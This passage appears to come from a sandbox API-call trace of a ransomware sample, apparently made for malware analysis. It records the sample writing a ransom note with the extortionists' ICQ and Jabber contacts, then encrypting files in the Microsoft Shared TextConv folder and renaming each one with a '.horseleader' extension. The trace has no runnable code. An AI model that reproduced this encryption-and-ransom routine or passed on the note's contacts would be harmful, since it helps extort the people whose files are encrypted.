Shared\\TextConv\\en-US\\#Decrypt#.txt") returned 79 [0245.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.817] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.817] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.818] lstrlenA (lpString="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") returned 1368 [0245.818] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.818] CloseHandle (hObject=0x158) returned 1 [0245.818] GetProcessHeap () returned 0x780000 [0245.818] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.818] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xcf518520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x23d78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSCONV97.DLL", cAlternateFileName="")) returned 1 [0245.818] lstrcmpiW (lpString1="MSCONV97.DLL", lpString2="Windows") returned -1 [0245.818] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned 72 [0245.819] StrStrIW (lpFirst="MSCONV97.DLL", lpSrch=".horseleader") returned 0x0 [0245.819] lstrcmpW (lpString1="MSCONV97.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.819] lstrcmpW (lpString1="MSCONV97.DLL", lpString2="_uninstalling_.png") returned 1 [0245.819] lstrlenW (lpString=".testttjffg") returned 11 [0245.819] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL", lpSrch=".testttjffg") returned 0x0 [0245.819] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.819] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.819] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.820] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned 72 [0245.820] StrStrW (lpFirst="MSCONV97.DLL", lpSrch=".txt") returned 0x0 [0245.820] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=146808) returned 1 [0245.820] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.820] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.822] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.822] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.824] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf6bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0245.824] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.824] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.824] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.825] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ed78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.825] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.826] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.827] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.827] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.827] CloseHandle (hObject=0x158) returned 1 [0245.827] GetProcessHeap () returned 0x780000 [0245.827] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.827] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.horseleader") returned 84 [0245.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll.horseleader")) returned 1 [0245.833] GetProcessHeap () returned 0x780000 [0245.833] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.833] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aeaee00, ftCreationTime.dwHighDateTime=0x1ca9122, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1aeaee00, ftLastWriteTime.dwHighDateTime=0x1ca9122, nFileSizeHigh=0x0, nFileSizeLow=0x8f68, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RECOVR32.CNV", cAlternateFileName="")) returned 1 [0245.833] lstrcmpiW (lpString1="RECOVR32.CNV", lpString2="Windows") returned -1 [0245.833] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned 72 [0245.833] StrStrIW (lpFirst="RECOVR32.CNV", lpSrch=".horseleader") returned 0x0 [0245.833] lstrcmpW (lpString1="RECOVR32.CNV", 
lpString2="#Decrypt#.txt") returned 1 [0245.833] lstrcmpW (lpString1="RECOVR32.CNV", lpString2="_uninstalling_.png") returned 1 [0245.833] lstrlenW (lpString=".testttjffg") returned 11 [0245.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV", lpSrch=".testttjffg") returned 0x0 [0245.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.834] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.836] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned 72 [0245.836] StrStrW (lpFirst="RECOVR32.CNV", lpSrch=".txt") returned 0x0 [0245.836] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=36712) returned 1 [0245.836] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.839] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.839] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f68, lpOverlapped=0x0) returned 1 [0245.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc098, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.840] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f68, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f68, lpOverlapped=0x0) returned 1 [0245.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.841] CloseHandle (hObject=0x158) returned 1 [0245.841] GetProcessHeap () returned 0x780000 [0245.841] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.841] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.horseleader") returned 84 [0245.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\textconv\\recovr32.cnv.horseleader")) returned 1 [0245.842] GetProcessHeap () returned 0x780000 [0245.842] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.842] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f938f00, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f938f00, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0xdfa0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Wks9Pxy.cnv", cAlternateFileName="")) returned 1 [0245.842] lstrcmpiW (lpString1="Wks9Pxy.cnv", lpString2="Windows") returned 1 [0245.842] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned 71 [0245.842] StrStrIW (lpFirst="Wks9Pxy.cnv", lpSrch=".horseleader") returned 0x0 [0245.842] lstrcmpW (lpString1="Wks9Pxy.cnv", lpString2="#Decrypt#.txt") returned 1 [0245.842] lstrcmpW (lpString1="Wks9Pxy.cnv", lpString2="_uninstalling_.png") returned 1 [0245.843] lstrlenW (lpString=".testttjffg") returned 11 [0245.843] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv", lpSrch=".testttjffg") returned 0x0 [0245.843] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.846] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned 71 [0245.846] StrStrW (lpFirst="Wks9Pxy.cnv", lpSrch=".txt") returned 0x0 [0245.846] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=57248) returned 1 [0245.846] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.849] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.849] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.850] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.850] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.850] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.850] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3fa0, lpOverlapped=0x0) returned 1 [0245.851] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc060, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.851] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3fa0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3fa0, lpOverlapped=0x0) returned 1 [0245.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.852] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.852] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.852] CloseHandle (hObject=0x158) returned 1 [0245.852] GetProcessHeap () returned 0x780000 [0245.852] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.852] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.horseleader") returned 83 [0245.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv.horseleader")) returned 1 [0245.854] GetProcessHeap () returned 0x780000 [0245.854] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.854] 
FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ce200, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xc226ea20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56ce200, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x30170, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPFT532.CNV", cAlternateFileName="")) returned 1 [0245.854] lstrcmpiW (lpString1="WPFT532.CNV", lpString2="Windows") returned 1 [0245.854] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned 71 [0245.854] StrStrIW (lpFirst="WPFT532.CNV", lpSrch=".horseleader") returned 0x0 [0245.854] lstrcmpW (lpString1="WPFT532.CNV", lpString2="#Decrypt#.txt") returned 1 [0245.854] lstrcmpW (lpString1="WPFT532.CNV", lpString2="_uninstalling_.png") returned 1 [0245.854] lstrlenW (lpString=".testttjffg") returned 11 [0245.854] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV", lpSrch=".testttjffg") returned 0x0 [0245.854] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.854] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned 71 [0245.855] StrStrW (lpFirst="WPFT532.CNV", lpSrch=".txt") returned 0x0 [0245.855] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=196976) returned 1 [0245.855] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.856] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.858] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.859] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.859] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x158b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.859] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.870] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.870] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2b170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.871] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.872] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.872] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.873] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.873] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.873] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.873] CloseHandle (hObject=0x158) returned 1 [0245.873] GetProcessHeap () returned 0x780000 [0245.874] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.874] wnsprintfW (in: 